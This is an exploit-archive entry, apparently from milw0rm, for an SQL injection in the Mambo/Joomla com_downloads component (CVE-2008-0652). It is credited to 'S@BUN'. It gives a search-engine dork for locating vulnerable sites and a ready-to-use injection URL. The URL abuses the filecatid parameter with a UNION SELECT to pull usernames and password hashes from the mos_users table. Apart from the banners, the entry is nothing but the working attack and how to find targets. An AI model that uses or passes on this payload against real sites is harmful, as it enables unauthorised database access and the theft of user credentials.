Mambo Component com_downloads - SQL Injection



EKU-ID: 13020 CVE: OSVDB-41440;CVE-2008-0652 OSVDB-ID:
Author: S@BUN Published: 2008-02-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#########################################################################
#
# joomla SQL Injection(com_downloads)(filecatid)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORKS 1 : allinurl :"com_downloads"filecatid
#
##########################################################################
EXPLOIT :

index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*


##########################################################################
# S@BUN                           www.hackturkiye.com                     S@BUN
##########################################################################
# S@BUN                              i AM NOT HACKER                      S@BUN
##########################################################################

# milw0rm.com [2008-02-06]